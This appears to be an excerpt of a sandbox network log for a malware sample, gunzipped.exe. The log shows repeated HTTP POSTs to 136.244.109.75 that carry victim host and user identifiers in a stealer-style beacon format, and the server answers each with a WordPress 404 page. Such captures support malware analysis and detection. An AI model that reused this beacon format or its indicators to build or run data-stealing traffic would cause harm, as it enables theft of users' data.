74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:18:29.480922937 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:18:29.480966091 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:18:29.480983973 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:18:29.481005907 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:18:29.481024981 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:18:29.481045008 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:18:29.481065035 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:18:29.481082916 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:18:29.481102943 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.5	49778	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:18:29.847908020 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:18:30.056888103 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:18:31.046307087 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:18:29 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:18:31.046369076 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:18:31.046410084 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:18:31.046449900 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:18:31.046493053 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:18:31.046533108 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:18:31.046574116 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:18:31.046611071 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:18:31.046648979 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:18:31.046689034 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.5	49779	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:18:31.393354893 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:18:31.596919060 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:18:32.588561058 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:18:31 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
